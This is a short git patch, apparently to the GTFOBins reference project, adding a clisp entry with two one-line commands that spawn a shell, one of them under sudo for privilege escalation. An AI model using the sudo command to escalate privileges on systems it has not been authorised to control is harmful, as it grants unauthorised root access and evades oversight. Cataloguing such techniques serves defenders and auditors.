From 39fed77e6924a2a41437b6acea378b093988f1bc Mon Sep 17 00:00:00 2001 From: frissi0n Date: Mon, 11 Nov 2024 13:22:54 +0000 Subject: [PATCH] Add clisp --- _gtfobins/clisp.md | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 _gtfobins/clisp.md diff --git a/_gtfobins/clisp.md b/_gtfobins/clisp.md new file mode 100644 index 0000000..0bd8e65 --- /dev/null +++ b/_gtfobins/clisp.md @@ -0,0 +1,7 @@ +--- +functions: + shell: + - code: clisp -x '(ext:run-shell-command "sh") (ext:exit)' + sudo: + - code: sudo clisp -x '(ext:run-shell-command "sh") (ext:exit)' +---